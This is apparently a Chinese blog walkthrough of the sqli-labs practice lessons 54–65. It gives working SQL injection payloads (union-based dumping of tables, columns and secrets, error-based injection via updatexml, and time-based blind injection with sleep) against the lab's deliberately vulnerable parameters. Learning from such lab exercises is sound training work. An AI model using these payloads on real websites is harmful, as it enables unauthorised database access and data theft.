sql-lib闯关之lesson54-65

LESS54

关卡要求:此挑战的目标是在不到10次的尝试中从数据库的随机表中转储(密钥       为了好玩,每次重置,挑战都会生成随机表名、列名和表数据。随时保持新鲜。

①判断列数(二分法)

输入:?id=1' order by 3--+

sql-lib闯关之lesson54-65

 

 

②当前数据库

输入:?id=-1' union select 1,2,database() --+

sql-lib闯关之lesson54-65

 

 

③查表

输入:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+

sql-lib闯关之lesson54-65

 

 9po9d7v0i2

 

④查字段

输入:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='9po9d7v0i2' --+

sql-lib闯关之lesson54-65

 

 

⑤查字段的值

输入:?id=-1' union select 1,2,group_concat(concat_ws(0x7e,id,sessid,secret_AMI8,tryy)) from challenges.9po9d7v0i2 --+

sql-lib闯关之lesson54-65

 

 1fecbfa88f364df34c32702b62f11a7d9Sic5glsmSMXhqiRnTYvYP5qv4

点击提交即可通过完毕。

sql-lib闯关之lesson54-65

 

 把你这个愚蠢的黑客赶走!

 

LESS55

sql-lib闯关之lesson54-65

 

 参数:(1)

次数:14次


LESS56

sql-lib闯关之lesson54-65

 

 

参数:(‘1’)

次数:14次
LESS57

sql-lib闯关之lesson54-65

 

 

参数:“1”

次数:14次
LESS58

次数:5次

这关不能使用 union select 没有返回回显位置。

我们使用报错注入。 

①查表

数据库已知是challenges

输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) --+

sql-lib闯关之lesson54-65

 

 

②查字段

输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='jxpizjpo9r')),1) --+

sql-lib闯关之lesson54-65

 

 

③查字段的值

输入:?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_XMHT) from challenges.jxpizjpo9r)),1) --+

sql-lib闯关之lesson54-65

 

 sql-lib闯关之lesson54-65

 

 恭喜你成功了!


LESS59

参数 :id=1  无包裹
LESS60

参数:id=(“1”)
LESS61

参数:id=((‘1’))
LESS62

sql-lib闯关之lesson54-65

 

 一共130次,显而易见盲注它来了!!

输入:?id=1') and if( left( (select table_name from information_schema.tables where table_schema='CHALLENGES' limit 0,1),1)> 'a' ,1, sleep(5)) --+

改变它的值逐次判断即可。
LESS63

参数:‘1’
LESS64

参数:((1))
LESS65

参数:(“1”)

上一篇:java通过文件头内容判断文件类型


下一篇:Flex布局